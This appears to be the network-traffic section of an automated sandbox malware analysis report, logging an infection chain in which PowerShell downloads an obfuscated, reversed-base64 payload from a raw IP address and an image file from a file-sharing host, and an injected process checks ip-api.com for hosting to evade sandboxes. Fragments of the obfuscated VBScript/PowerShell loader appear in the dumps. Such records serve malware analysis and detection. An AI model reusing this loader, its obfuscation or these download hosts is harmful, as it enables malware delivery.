Nov 20, 2024 08:28:05.607988119 CET	896	IN	Data Raw: 00 52 00 77 00 4d 00 32 00 4e 00 76 00 62 00 57 00 31 00 68 00 62 00 6d 00 52 00 43 00 65 00 58 00 52 00 6c 00 63 00 79 00 41 00 39 00 49 00 46 00 74 00 54 00 65 00 58 00 4e 00 30 00 5a 00 57 00 30 00 75 00 51 00 32 00 39 00 75 00 64 00 6d 00 56 Data Ascii: RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKyd
Nov 20, 2024 08:28:05.608004093 CET	1236	IN	Data Raw: 00 6a 00 46 00 74 00 64 00 48 00 68 00 30 00 4c 00 6b 00 5a 00 53 00 52 00 6b 00 5a 00 53 00 56 00 79 00 38 00 79 00 4e 00 54 00 4d 00 76 00 4d 00 7a 00 45 00 75 00 4d 00 6a 00 49 00 75 00 4d 00 79 00 34 00 79 00 4f 00 54 00 45 00 76 00 4c 00 7a Data Ascii: jFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2GZYVWJSALIPUXNQYWRvRjGZYVWJSALIPUXNQFtLCBGJysnMW1kZXNh
Nov 20, 2024 08:28:05.608021975 CET	1236	IN	Data Raw: 00 6e 00 58 00 56 00 74 00 6a 00 61 00 47 00 46 00 53 00 58 00 54 00 4d 00 35 00 4b 00 53 00 35 00 53 00 52 00 58 00 42 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 73 00 59 00 57 00 4e 00 6c 00 4b Data Ascii: nXVtjaGFSXTM5KS5SRXBGZYVWJSALIPUXNQsYWNlKChbY2hhUl02OCtbY2hhUl0GZYVWJSALIPUXNQxMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYV
Nov 20, 2024 08:28:05.608048916 CET	1236	IN	Data Raw: 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 3d 00 20 00 27 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: YVWJSALIPUXNQ= 'GZYVWJSALIPUXNQ" xantorreia = xantorreia & "GZYVWJSALIPUXNQ" & ocluso & "'GZYVWJSALIPUXNQ"
Nov 20, 2024 08:28:05.608064890 CET	1236	IN	Data Raw: 00 61 00 20 00 3d 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 26 00 20 00 22 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 2e 00 65 00 47 00 5a 00 59 00 56 00 57 00 4a Data Ascii: a = xantorreia & "GZYVWJSALIPUXNQ.eGZYVWJSALIPUXNQncGZYVWJSALIPUXNQo" xantorreia = xantorreia & "dGZYVWJSALIPUXN
Nov 20, 2024 08:28:05.608081102 CET	1236	IN	Data Raw: 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 3d 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 26 00 20 00 22 00 76 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 Data Ascii: xantorreia = xantorreia & "vGZYVWJSALIPUXNQerGZYVWJSALIPUXNQt]:" xantorreia = xantorreia & ":GZYVWJSALIPUXNQFrG
Nov 20, 2024 08:28:05.613013029 CET	1236	IN	Data Raw: 00 72 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 73 00 68 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 3d Data Ascii: rGZYVWJSALIPUXNQsh" xantorreia = xantorreia & "elGZYVWJSALIPUXNQl.GZYVWJSALIPUXNQe" xantorreia = xantor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	54436	192.3.22.13	80	7036	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 08:28:28.258450985 CET	75	OUT	GET /352/WRFFRF.txt HTTP/1.1 Host: 192.3.22.13 Connection: Keep-Alive
Nov 20, 2024 08:28:28.835448027 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 07:28:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:28:04 GMT ETag: "50000-62740a67be77d" Accept-Ranges: bytes Content-Length: 327680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDMAAAAMAwAQDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 20, 2024 08:28:28.835496902 CET	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 51 44 2b 6b 48 62 69 31 57 5a 7a 4e 58 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcldWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCbl
Nov 20, 2024 08:28:28.835509062 CET	1236	IN	Data Raw: 5a 58 5a 4d 35 32 62 70 52 58 64 6a 56 47 65 46 52 57 5a 30 4e 58 5a 31 46 58 5a 79 78 44 49 67 41 43 49 67 41 43 49 67 6f 51 44 2b 49 79 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 Data Ascii: ZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIzV2ZlxWa2lmcQRWZ0NXZ1FXZyxDIgACIgAiCN4Te0lmc1NWZzxDIgACIK0gPiIjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4Bybm5WS0NXdyRHPgAiCN4zLiAHch5ib
Nov 20, 2024 08:28:28.835527897 CET	1236	IN	Data Raw: 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 38 44 41 6b 43 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 67 5a 41 6b 44 41 79 41 41 4d 41 41 44 41 35 41 51 59 41 51 44 41 68 42 51 4d 41 51 44 41 6b 42 51 4c 41 49 47 41 6a 42 51 Data Ascii: BwQAwGAhBwZAUGAMBQAA8DAkCAAAAAAlBAeAUGAuAgZAkDAyAAMAADA5AQYAQDAhBQMAQDAkBQLAIGAjBQYAkDAtAQZAUDA5AANA0CAzAAZAkDAjBQLAMGAzAQNAgDAiBQNAQDAmBAAAUGAtBQYA4EAsBQYA4GAyBQZAQHAuBQSAEAApAAdAAAAwAgLAADAuAAMA4CAxAAAAAAAuBwbAkGAzBgcAUGAWBQZAwGApBgRAEAAIAAM
Nov 20, 2024 08:28:28.835540056 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 20, 2024 08:28:28.835553885 CET	1236	IN	Data Raw: 30 78 67 52 30 78 67 52 30 78 67 52 6b 68 45 5a 49 52 47 44 4b 52 46 44 4b 52 67 41 4b 52 45 44 4b 52 44 44 4b 52 43 44 4b 52 42 44 47 68 44 48 67 43 43 49 30 68 45 46 30 42 42 48 67 41 48 43 45 41 41 45 67 51 59 42 4b 68 44 4a 4c 6f 45 4f 6b 76 Data Ascii: 0xgR0xgR0xgRkhEZIRGDKRFDKRgAKREDKRDDKRCDKRBDGhDHgCCI0hEF0BBHgAHCEAAEgQYBKhDJLoEOkvgSYwBO4QADKRAgYQ/CKBAgUACJLoEB0sgSUhDJLoEZFoE5LoEOcwBWkIgSAAAF4QSBKRHBAwBIgQSBKRHJFoEJFoEdggDHcQEhERIRIgAAcQgAKRHAAgBIEIgS0BCDcACA4RAxLoEVcAATgQACAiBA4RA9JRFGgAA
Nov 20, 2024 08:28:28.835563898 CET	1236	IN	Data Raw: 67 51 42 64 67 51 42 64 67 51 42 64 77 58 67 52 41 59 67 53 55 51 42 46 30 68 45 64 49 78 44 48 45 43 43 38 46 59 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 41 47 6f 45 64 41 59 67 53 30 42 67 42 4b 52 48 41 47 6f 45 49 55 51 48 49 41 59 67 53 30 77 Data Ascii: gQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQmCKhAHYACVKoECcgBOEQgBKRFO4gAAoAC5JRECKhDdUcgS4QANJRFGcgEIggDd4QANJRFOggDO4QHYFoEOEQTSUxCHkBCsFoEsFoEB0kEVMwBNwVgREgCF0ogRoQAAYwCOEAAEQWgREgCFgwBIgwB
Nov 20, 2024 08:28:28.835581064 CET	1236	IN	Data Raw: 30 68 44 56 63 67 4b 49 6b 6e 45 52 49 6f 45 35 4a 52 45 43 4b 68 44 42 6b 50 67 52 55 52 78 42 4b 52 78 42 4b 68 44 4f 45 51 54 53 55 68 44 42 30 6b 45 56 73 77 42 6b 67 67 44 42 6b 50 67 52 55 42 51 42 4b 68 44 4f 45 51 54 53 55 42 51 42 4b 52 Data Ascii: 0hDVcgKIknERIoE5JRECKhDBkPgRURxBKRxBKhDOEQTSUhDB0kEVswBkggDBkPgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQBIggDdggDF0BCIAUgSgACF0RBdgSgS4QvBKBGOAUgSEQTSUxEHUyAOEAAEgwAdMQHI4QHD0BQBKhDO4gDO4QHO4AQBKRANJRFQcwHI4ACOgQBdUQHOgwBMggDOIQXSUhDCkdgRUBQ
Nov 20, 2024 08:28:28.835592985 CET	776	IN	Data Raw: 4b 42 43 4f 30 52 42 64 55 51 48 49 67 51 42 64 34 41 51 42 4b 52 41 4e 4a 52 46 4f 77 77 42 61 67 41 43 49 30 42 43 49 30 42 43 64 67 51 48 49 67 51 48 49 67 41 43 49 30 42 43 64 34 77 44 48 67 42 43 49 55 51 48 49 4d 41 49 48 6f 41 43 42 41 41 Data Ascii: KBCO0RBdUQHIgQBd4AQBKRANJRFOwwBagACI0BCI0BCdgQHIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABJJYEFJYEBJYEOEABg0ACAFoEBkPgRUhDBkPgRUhDBkPgRUhDBkPgRUBQBKRANJRFAFoEC4ACIgACAFoEI4gACUQHIkjgS4gDO4QANJRFO4QANJRFOEQTSUhDO4gDAFoEB0kEVEyBYhACO0BQBKRANJRFAFoEO4AH
Nov 20, 2024 08:28:28.835607052 CET	1236	IN	Data Raw: 34 67 44 43 30 6c 45 56 34 67 41 5a 48 59 45 56 34 67 44 41 46 6f 45 4f 41 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 63 77 4c 6b 48 6f 45 42 6b 50 67 52 55 42 43 6b 48 6f 45 42 30 6b 45 56 63 41 43 4a 51 65 67 53 45 51 2b 41 47 52 46 49 34 51 Data Ascii: 4gDC0lEV4gAZHYEV4gDAFoEOAVgS4AQBKRANJRFOcwLkHoEBkPgRUBCkHoEB0kEVcACJQegSEQ+AGRFI4QHAFoEB0kEVQegSAUgSAegS4gDd4AQBKRANJRFNcgKIggDD4QBHcACD0BCO0xAdggDdAUgS4gDd4gDd4gDd4gDOAUgSEQTSUhDTcAJD0RABASBDgQAgQACIgACD0BCIcwBKwBHc4wAAYAHd4QAAUACc0BHdggDdggD
Nov 20, 2024 08:28:28.840743065 CET	1236	IN	Data Raw: 59 41 43 31 48 6f 45 43 63 67 42 49 67 51 42 64 55 51 48 44 41 43 43 46 30 52 42 64 6b 65 67 53 49 41 49 4a 45 66 67 52 45 51 41 67 59 51 63 52 45 51 41 67 55 41 43 46 30 68 44 6c 48 6f 45 4f 6b 65 67 53 55 65 67 53 55 51 48 49 63 67 45 42 4d 42 Data Ascii: YAC1HoECcgBIgQBdUQHDACCF0RBdkegSIAIJEfgREQAgYQcREQAgUACF0hDlHoEOkegSUegSUQHIcgEBMBAgQAQBKhDCEegRURCBMBATIQ4BGRFAAyCAFoEOIQ3BKRFJEwEAMhAdHoEVAAILAUgS4gAZHYEVkAQBKhDCUdgSURCO4gAdJRFG4gDC0lEV4gAZHYEVwQATAwECkdgRUBAgsgDOIQXSUhDCUdgSUBDBMBATIQ1BKRF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	54446	208.95.112.1	80	1012	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 08:28:29.562482119 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 20, 2024 08:28:30.026309967 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 07:28:29 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49725	142.215.209.78	443	7036	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 07:28:11 UTC	192	OUT	GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 Host: 1017.filemail.com Connection: Keep-Alive
2024-11-20 07:28:11 UTC	324	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT Accept-Ranges: bytes ETag: 4bb5a8185f3b16880e3dcc573015c5d9 X-Transfer-ID: wxhdiueivoluihj Content-Disposition: attachment; filename=new_imagem.jpg Date: Wed, 20 Nov 2024 07:28:10 GMT Connection: close
2024-11-20 07:28:11 UTC	1303	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: cc fc 86 59 a8 00 57 82 2c dd 01 56 3b 74 cf 3f f6 8a 37 93 f6 b3 e2 cf e9 20 f8 b4 b4 58 f1 7e 61 ae 0f 6c 7f ec 14 e8 da 0f b4 7b b7 32 ae 8e 26 16 db 79 13 21 53 f4 34 70 ff 00 6a 56 33 fb 4a d6 a1 45 50 de 20 4a 80 49 e7 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 Data Ascii: YW,V;t?7 X~al{2&y!S4pjV3JEP JIw$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: 9f 7a 50 01 3c 0e 4d f4 c0 fa ac be 3f a6 d4 c9 26 b1 34 ec ad 09 0a f0 12 e0 7a 55 89 bf 5d 30 f4 9e 41 1c 67 9c f1 bf b4 7a 2f 17 d4 2e 9a 1d 39 8e 2f 26 49 89 0c c4 b6 d5 62 43 0d c4 8b db 42 8f 43 ef c6 63 ea 7c 67 5d 37 86 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 Data Ascii: zP<M?&4zU]0Agz/.9/&IbCBCc\|g]7:9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi\|QUB81k}w1"eP}0cQ!K
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: 25 80 b5 40 d9 1c d7 cb 05 ab d1 47 02 46 8a e0 c8 54 b3 5d 70 40 be 68 9c d1 7d 24 8e a0 07 6b 03 a5 59 03 ae 06 6d 16 b6 72 ad 23 ee af 4d bf 27 6e 06 12 cb b4 30 2a 0f 4e 98 22 db 9a eb 8f 6c f4 49 e1 5a 60 a4 16 1b cf 51 db 03 27 84 a4 4f c9 50 0f 4a c0 c5 58 9d 98 28 1f 8b 81 8c 4d a4 78 18 2e db 1d 4b 66 b3 7e e1 a3 42 80 03 dc 8b c8 d4 ce 9a 92 a9 0a 2d 8e a4 9f e9 81 8a f1 9b 1c d7 c3 04 54 86 da 31 d9 4b 09 c4 63 6b 37 e8 30 3a 88 8c 2f 64 9b 3d c7 7c 0a 88 88 6d ac 68 8c ba 46 ad 77 e9 18 c0 d3 0f 2c 38 2c 59 ad b9 c5 cb 06 04 81 c8 e0 e0 70 81 37 8a 6e 09 a1 86 11 2c 64 d8 b0 0d 0c 5d 56 a8 ed 1d 7b e3 65 76 a8 72 87 9e fd b0 0a 35 01 5a a3 5d a7 a5 7b e3 12 a3 c8 82 32 0b 6e 1d 47 6c 49 f5 36 79 15 5d 30 e9 3b b3 21 1d f0 14 d4 c3 22 4e 08 0c Data Ascii: %@GFT]p@h}$kYmr#M'n0*N"lIZ`Q'OPJX(Mx.Kf~B-T1Kck70:/d=\|mhFw,8,Yp7n,d]V{evr5Z]{2nGlI6y]0;!"N
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: e5 d3 48 e9 0a ac 86 9f af d3 20 42 cb 25 16 b0 78 bc 05 cb 28 21 ab 9b e7 0c f3 ee 8c 26 de 08 fd 72 66 81 23 74 63 cf 63 88 eb 75 6b 0c aa a8 01 27 ae 05 f5 b2 87 d2 b2 9a 56 a0 39 f9 e6 4e c9 21 09 29 51 b4 9f 49 3d eb 19 d6 3f 9b 32 46 b6 41 ab 03 35 5f 48 9a cd 2a c5 c2 85 1e 9f 86 05 34 de 29 a5 9c 04 9d 15 28 59 66 e9 f4 ce 93 41 14 52 7d e7 c3 f5 21 eb 9a 5c b6 9b c0 a3 89 af 50 de 60 f8 76 c6 b4 da 14 80 b4 51 d9 8d 8d de e3 7f 2c 07 3c 23 51 ae 7d 27 89 b1 8d 8f ee 03 32 2d f3 52 29 ba f8 0d d8 83 6a 48 98 82 9b 64 1e ad a7 be 6b 78 5b 4b 1e be 65 dd b5 5b 4f 30 34 7a 81 1b 1e 7f 2c 51 23 59 d8 da d8 6b a2 70 35 b4 ff 00 68 3c 3d b4 28 65 d5 f8 e4 6c 88 03 24 53 2a a5 8e c0 5f 4c d7 f0 5f 12 83 c4 f5 7e 4c 5a 9d 4e ab 4d 26 9d a2 99 75 04 09 90 Data Ascii: H B%x(!&rf#tccuk'V9N!)QI=?2FA5_H4)(YfAR}!\P`vQ,<#Q}'2-R)jHdkx[Ke[O04z,Q#Ykp5h<=(el$S_L_~LZNM&u
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: 30 3e b2 d1 1d 9c 75 38 94 91 7a 8d 8b eb 9a 2e 43 29 50 bb 6b 11 72 77 10 70 15 28 04 40 85 ae 72 a0 d1 ed f5 c2 90 58 10 3a e5 0c 66 b9 eb 81 c5 43 25 8b dc 7a 7b 67 05 1b 80 2b c7 7f 9e 4e fa ae 38 3d 32 55 94 29 b1 57 81 56 0a 7a 0a ac a3 af 23 2e 64 5b a1 d7 2e 45 8c 00 81 43 9e 99 71 23 96 55 57 7d a3 f0 f3 41 6f 8f eb 9d ce d2 2e b2 40 2a bd 3e b8 1a 29 e3 9a c8 62 00 08 d8 7f 98 31 fe b9 cf e3 ba b6 40 c5 20 04 fb 2b 7f ea cc b0 ac cd c1 dd 47 df 35 17 c0 b5 32 aa fe f2 02 2a e8 33 77 ff 00 87 00 49 e3 3a 80 01 2b 11 ff 00 85 bf f5 64 1f 1a d4 b9 08 52 20 07 f9 5b fb e7 4f e1 13 40 6d de 3d b5 b8 b2 ee a1 db 93 58 2d 2f 87 be b1 06 d9 e1 bb 63 b4 b1 b1 55 d6 87 c7 00 92 f8 dc d4 41 48 88 51 74 11 bf f5 62 3a df 1f d5 f8 8e 89 f4 92 41 02 c6 e0 03 Data Ascii: 0>u8z.C)Pkrwp(@rX:fC%z{g+N8=2U)WVz#.d[.ECq#UW}Ao.@>)b1@ +G523wI:+dR [O@m=X-/cUAHQtb:A
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: be 1a 29 74 b2 40 22 45 04 05 e6 fa 62 f2 e8 e3 60 aa 42 a8 1d c3 61 21 d3 c7 10 f4 8b 1e f8 05 76 8b 4f 0a 70 00 27 a0 c9 12 a1 2b 40 05 3e f9 04 a9 5a db 83 0e a8 0a ba d0 18 13 b9 22 97 d6 54 0b ca c3 aa 83 ef 4c 79 91 8d 85 00 1e 30 3a 96 47 81 80 34 7b 7e 79 ad e0 de 17 e4 c2 25 75 0c cc 2f e5 80 09 34 92 4a d6 09 a2 bd 3d b0 7a 08 04 73 32 ca fb 68 fb e7 a0 70 ab 44 00 6c 66 17 89 42 90 ca 25 0f c1 e4 81 80 9c b0 83 e3 c1 23 6a dc 78 3f f0 e0 35 42 71 24 be 68 24 98 f6 d9 ec 03 0c 6a 05 1a cf 1d 8b c9 21 01 50 6c f6 f4 e3 3e 29 a7 6d 3e a0 d8 0c 4e 95 b7 1d d5 5e aa bf cf 01 1f 11 86 48 11 44 84 51 7b ab e9 d7 12 0a f3 ca 91 8b 24 00 00 f6 14 33 7f c4 61 8f fd 9d 12 3b 97 da cb ea 63 67 96 37 fc f3 bc 13 47 0a 68 86 b6 67 41 e6 1a 52 ec 00 14 48 e2 Data Ascii: )t@"Eb`Ba!vOp'+@>Z"TLy0:G4{~y%u/4J=zs2hpDlfB%#jx?5Bq$h$j!Pl>)m>N^HDQ{$3a;cg7GhgARH
